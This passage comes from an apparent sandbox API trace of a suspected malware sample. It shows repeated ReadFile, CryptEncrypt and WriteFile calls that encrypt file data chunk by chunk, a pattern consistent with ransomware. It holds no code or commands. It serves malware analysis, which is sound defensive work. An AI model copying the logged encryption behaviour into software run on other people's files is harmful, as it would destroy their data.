lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.764] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.764] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.764] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.764] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.765] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.765] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.765] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.765] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.765] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.765] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.765] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.765] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.765] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.765] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.766] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.766] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.766] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.766] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.766] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.766] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.766] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.766] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.766] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.766] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.766] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.766] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.766] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.766] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.766] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.767] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.767] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.767] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.767] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.767] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.767] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.767] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.767] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.767] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.767] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.767] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.767] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.767] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.767] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.768] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.768] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.768] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.768] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.768] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.768] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.768] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.768] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.768] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.768] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.768] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.768] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.768] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.768] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.768] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.769] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.769] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.769] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.769] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.769] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.769] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.769] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.769] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.769] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.769] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.769] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.769] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.769] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.770] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.770] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.770] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.770] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.770] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.770] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.770] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.770] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.770] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.770] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.770] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.770] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.770] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.770] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.770] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.771] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.771] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.771] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.771] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.771] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.771] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.771] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.771] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.771] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.771] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.771] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.771] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.771] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.771] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.771] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.772] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.772] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 